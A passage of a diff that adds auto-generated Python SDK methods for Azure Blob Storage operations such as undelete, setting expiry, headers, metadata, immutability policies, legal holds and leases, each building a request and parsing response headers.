:type request_id_parameter: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_undelete_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.undelete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + undelete.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_expiry( # pylint: disable=inconsistent-return-statements + self, + expiry_options, # type: Union[str, "_models.BlobExpiryOptions"] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + expires_on=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Sets the time a blob will expire and be deleted. + + :param expiry_options: Required. Indicates mode of the expiry time. + :type expiry_options: str or ~azure.storage.blob.models.BlobExpiryOptions + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param expires_on: The time to set the blob to expiry. Default value is None. + :type expires_on: str + :keyword comp: comp. Default value is "expiry". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "expiry") # type: str + + + request = build_set_expiry_request( + url=self._config.url, + comp=comp, + version=self._config.version, + expiry_options=expiry_options, + timeout=timeout, + request_id_parameter=request_id_parameter, + expires_on=expires_on, + template_url=self.set_expiry.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_expiry.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_http_headers( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set HTTP Headers operation sets system properties on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _blob_cache_control = None + _blob_content_type = None + _blob_content_md5 = None + _blob_content_encoding = None + _blob_content_language = None + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _blob_content_disposition = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + + request = build_set_http_headers_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_md5=_blob_content_md5, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_content_disposition=_blob_content_disposition, + request_id_parameter=request_id_parameter, + template_url=self.set_http_headers.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_http_headers.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_immutability_policy( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Immutability Policy operation sets the immutability policy on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_set_immutability_policy_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + if_unmodified_since=_if_unmodified_since, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + template_url=self.set_immutability_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def delete_immutability_policy( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """The Delete Immutability Policy operation deletes the immutability policy on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + + + request = build_delete_immutability_policy_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.delete_immutability_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_legal_hold( # pylint: disable=inconsistent-return-statements + self, + legal_hold, # type: bool + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Legal Hold operation sets a legal hold on the blob. + + :param legal_hold: Specified if a legal hold should be set on the blob. + :type legal_hold: bool + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "legalhold". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "legalhold") # type: str + + + request = build_set_legal_hold_request( + url=self._config.url, + comp=comp, + version=self._config.version, + legal_hold=legal_hold, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_legal_hold.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_legal_hold.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Blob Metadata operation sets user-defined metadata for the specified blob as one or + more name-value pairs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_set_metadata_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + duration=None, # type: Optional[int] + proposed_lease_id=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. + :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in 